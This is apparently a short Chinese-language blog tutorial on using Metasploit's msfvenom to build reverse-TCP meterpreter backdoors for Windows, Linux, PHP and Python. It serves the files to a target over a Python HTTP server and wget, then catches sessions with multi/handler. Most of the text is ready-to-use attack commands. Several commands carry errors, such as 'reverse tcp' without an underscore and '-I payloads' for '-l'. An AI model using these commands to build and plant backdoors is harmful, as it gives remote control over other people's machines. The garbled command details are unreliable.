msfvenom
使用msfvenom软件生成木马后门,在目标机上执行后门,在本地机上监听上线。
小提示:maf即是metasploit,venom即是病毒
如果不知道msfvenom怎么用,可以msfvenom -h查看,四种生成后门的命令:
windows可执行程序后门:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Linux可执行程序后门:msfvenom -p linux/x64/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
php脚本后门: msfvenom -p php/meterpreter/reverse tcp LHOST =<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
python脚本后门:msfvenom -p python/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
http.server
在本地机上生成后门后如何传入目标机器中呢?可以通过Python的http服务:
python3 -m http.server 8888
注意:如果不指定端口号,默认是8000端口
在windows中可以打开浏览器,输入:
172.17.17.128:8888
在linux中可使用wget获取,输入:
wget http://172.17.17.128:8000/shell.elf
目标机开启监听
use exploit/multi/handler
windows:set payload windows/x64/meterpreter/reverse_tcp,linux:set payload linux/x64/meterpreter/reverse_tcp
set lhost 172.17.17.128
set lport 4444
msfvenom查看
上面我们是针对windows来生成了一个木马后门,但是有时候我们不一定知道我们要生成的都有那些参数,比如说我们要攻击Android,我不知道要生成什么样的可执行文件,甚至我压根不知道payload要选什么,我怎么知道这个payload有这么几个参数要设置呢?那我们什么都不知道的情况下该如何查看我们所需要的内容,这时候msfvenom可以使用命令来进行查看:
查看msfvenom支持的格式:msfvenom -l formats
查看msfvenom支持的攻击载荷:msfvenom -I payloads 针对win:msfvenom -l payloads |grep windows
查看msfvenom支持的编码:msfvenom -l encoders
查看payload的信息与设置:msfvenom -p cmd/windows/adduser --list-options
网友评论